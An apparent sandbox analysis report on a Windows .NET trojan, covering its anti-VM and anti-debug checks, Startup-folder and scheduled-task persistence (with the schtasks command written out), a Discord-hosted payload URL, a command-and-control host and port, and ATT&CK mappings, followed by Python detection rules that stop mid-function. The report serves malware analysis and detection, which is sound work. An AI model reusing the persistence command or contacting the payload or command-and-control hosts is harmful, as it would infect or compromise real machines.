Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 595297Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 595187Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 595078Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 594969Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 594860Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 594735Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 594610Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 594485Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 594360Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 594235Jump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Window / User API: threadDelayed 1738
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Window / User API: threadDelayed 7970
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Thread delayed: delay times: 922337203685477, 600000, 599891, 599781, 599672, 599547, 599406, 599297, 599188, 599063, 598937, 598828, 598719, 598605, 598485, 598373, 598259, 598141, 598030, 597922, 597813, 597688, 597563, 597438, 597327, 597219, 597094, 596984, 596875, 596765, 596656, 596547, 596438, 596313, 596203, 596094, 595969, 595860, 595746, 595637, 595516, 595406, 595297, 595187, 595078, 594969, 594860, 594735, 594610, 594485, 594360, 594235
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Thread delayed: delay times: 922337203685477, 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | File opened: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\; C:\Users\user\AppData\; C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\; C:\Users\user\; C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\; C:\Users\user\AppData\Roaming\
Source: Amcache.hve.13.dr | Binary or memory string: VMware
Source: Amcache.hve.13.dr | Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.13.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.13.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe, 00000000.00000002.2720847952.000000000116D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.13.dr | Binary or memory string: vmci.sys
Source: Amcache.hve.13.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.13.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.13.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr, 00000002.00000002.3240123404.000000001B580000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
Source: Amcache.hve.13.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.13.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.13.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.13.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563

Anti Debugging

Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Code function: 0_2_0144EE00 CheckRemoteDebuggerPresent,0_2_0144EE00
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Process token adjusted: Debug
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Process queried: DebugObjectHandle
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Process queried: DebugPort
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | File created: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | File created: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Process created: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr "C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr" /S
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ" /tr "C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Queries volume information: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe VolumeInformation
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Queries volume information: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr VolumeInformation
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Queries volume information: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr VolumeInformation
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Queries volume information: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr VolumeInformation
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.13.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr | Binary or memory string: MsMpEng.exe
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 1 Windows Management Instrumentation | 1 Scheduled Task/Job | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 231 Security Software Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 11 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | 1 Scheduled Task/Job | 321 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 11 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 1 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | 321 Registry Run Keys / Startup Folder | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Ingress Tool Transfer | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 11 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 2 Non-Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | Data Transfer Size Limits | 3 Application Layer Protocol | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 2 Obfuscated Files or Information | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | 11 Software Packing | DCSync | 22 System Information Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Behavior Graph (the graph image is not part of this text; the information recoverable from it follows)

Behavior Graph ID: 1331098 | Sample: #U043f#U0440#U043e#U0432#U0... | Startdate: 24/10/2023 | Architecture: WINDOWS | Score: 100
Hosts on the graph: ip-api.com; ideas-teams.at.ply.gg; cdn.discordapp.com
Signatures at the graph root: Multi AV Scanner detection for domain / URL; Multi AV Scanner detection for dropped file; .NET source code contains potential unpacker; 3 other signatures
Processes started at the root: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe [17 9]; fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr [1]; fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr; fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
Sample process (#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe): network: cdn.discordapp.com 162.159.135.233, 443, 49713, 49714, CLOUDFLARENETUS United States; dropped: C:\Users\user\AppData\Roaming\...\wininit.scr (PE32), fMSltjPKLJOyGNdEEU...QFZQHUfONBBckwZ.scr (PE32); signatures: Creates autostart registry keys with suspicious values (likely registry only malware); Creates multiple autostart registry keys; Drops PE files with a suspicious file extension; 2 other signatures; child processes: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr [15 7], WerFault.exe [22 16]
Root-level fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr [1]: signature: Multi AV Scanner detection for dropped file
fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr started by the sample: network: ip-api.com 208.95.112.1, 49715, 80, TUT-ASUS United States; ideas-teams.at.ply.gg 209.25.140.229, 54323, COGECO-PEER1CA Canada; dropped: fMSltjPKLJOyGNdEEU...QFZQHUfONBBckwZ.scr (PE32), fMSltjPKLJOyGNdEEU...QFZQHUfONBBckwZ.scr (PE32); signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Creates autostart registry keys with suspicious values (likely registry only malware); 5 other signatures; child process: schtasks.exe [1]
schtasks.exe: child process: conhost.exe

Source | Detection | Scanner | Label
#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\wininit.scr | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | 91% | ReversingLabs | ByteCode-MSIL.Trojan.Nekark
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | 51% | Virustotal |
C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | 91% | ReversingLabs | ByteCode-MSIL.Trojan.Nekark
C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | 51% | Virustotal |
C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\wininit.scr | 39% | ReversingLabs | Win32.Trojan.Mardom
C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | 91% | ReversingLabs | ByteCode-MSIL.Trojan.Nekark
C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | 51% | Virustotal |
No Antivirus matches
Source | Detection | Scanner | Label
ideas-teams.at.ply.gg | 8% | Virustotal |
Source | Detection | Scanner | Label
http://www.whatsmyip.us/showipsimple.php | 0% | Avira URL Cloud | safe
http://www.whatsmyip.us/showipsimple.php | 3% | Virustotal |
Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
cdn.discordapp.com | 162.159.135.233 | true | false |  | high
ip-api.com | 208.95.112.1 | true | false |  | high
ideas-teams.at.ply.gg | 209.25.140.229 | true | false |  | unknown
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
https://cdn.discordapp.com/attachments/1161633037004587060/1161731056462995496/lient.exe | false |  | high
http://cdn.discordapp.com/attachments/1161633037004587060/1161731056462995496/lient.exe | false |  | high
http://ip-api.com/line/?fields=hosting | false |  | high
URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
http://upx.sf.net | Amcache.hve.13.dr | false |  | high
http://www.whatsmyip.us/showipsimple.php | #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe, wininit.scr.0.dr | false | 3% Virustotal; Avira URL Cloud: safe | unknown
https://cdn.discordapp.com | #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe, 00000000.00000002.2721666334.0000000002F32000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe, 00000000.00000002.2721666334.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp; fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr, 00000002.00000002.3239287368.00000000027D9000.00000004.00000800.00020000.00000000.sdmp; fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr, 00000002.00000002.3239287368.0000000002761000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://cdn.discordapp.com | #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe, 00000000.00000002.2721666334.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://ip-api.com | fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr, 00000002.00000002.3239287368.00000000027D9000.00000004.00000800.00020000.00000000.sdmp; fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr, 00000002.00000002.3239287368.0000000002819000.00000004.00000800.00020000.00000000.sdmp | false |  | high
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
209.25.140.229 | ideas-teams.at.ply.gg | Canada | 13768 | COGECO-PEER1CA | false
162.159.135.233 | cdn.discordapp.com | United States | 13335 | CLOUDFLARENETUS | false
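The network section above shows a three-step pattern worth detecting as a sequence rather than as isolated indicators: the sample fetches a PE from the Discord CDN, the dropped .scr asks ip-api.com whether its public IP belongs to a hosting provider (a common sandbox/VPS check), and two seconds later it opens a TCP connection to ideas-teams.at.ply.gg on port 54323. The following is an added example written for this page, not code from Joe Sandbox or from the sample; the log format, PIDs and timestamps are constructed, the hosts, ports and paths are taken from the report, and treating *.ply.gg as a playit.gg tunnel endpoint is this example's own assumption.

```python
"""Behavioural detection over constructed network log lines modelled on this
report's connections. The log format, PIDs and timestamps are assumptions;
hosts, ports and URL paths come from the report."""
import re
from datetime import datetime, timedelta

# Constructed log lines (not taken from the report); one event per line:
#   <ISO timestamp> pid=<n> proto=<p> host=<h> port=<n> path=<url path or ->
LOG = """\
2023-10-24T09:28:40 pid=1000 proto=https host=cdn.discordapp.com port=443 path=/attachments/1161633037004587060/1161731056462995496/lient.exe
2023-10-24T09:28:55 pid=7504 proto=http host=ip-api.com port=80 path=/line/?fields=hosting
2023-10-24T09:28:57 pid=7504 proto=tcp host=ideas-teams.at.ply.gg port=54323 path=-
2023-10-24T09:29:30 pid=4120 proto=https host=www.microsoft.com port=443 path=/
2023-10-24T09:31:10 pid=4120 proto=http host=ip-api.com port=80 path=/json/
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) pid=(?P<pid>\d+) proto=(?P<proto>\w+) host=(?P<host>\S+) "
    r"port=(?P<port>\d+) path=(?P<path>\S+)$")

# Discord attachment URL carrying an executable payload
DISCORD_EXE = re.compile(r"^/attachments/\d+/\d+/[^/]+\.(?:exe|scr|dll|zip)$", re.I)


def parse_log(text):
    """Turn the constructed log text into a list of event dicts."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # ignore lines that do not fit the assumed format
        ev = m.groupdict()
        ev["ts"] = datetime.fromisoformat(ev["ts"])
        ev["pid"] = int(ev["pid"])
        ev["port"] = int(ev["port"])
        events.append(ev)
    return events


def single_event_rules(ev):
    """Rules that fire on one event; each returns a rule name."""
    hits = []
    if ev["host"] == "cdn.discordapp.com" and DISCORD_EXE.match(ev["path"]):
        hits.append("discord_cdn_executable_download")
    # /line/?fields=hosting answers only "is this IP a hosting provider?",
    # which is how the sample decides whether it runs in a sandbox or VPS;
    # a plain /json/ geolocation lookup does not match this rule.
    if ev["host"] == "ip-api.com" and "fields=hosting" in ev["path"]:
        hits.append("ip_api_hosting_check")
    if ev["host"].endswith(".ply.gg"):  # assumption: playit.gg tunnel domain
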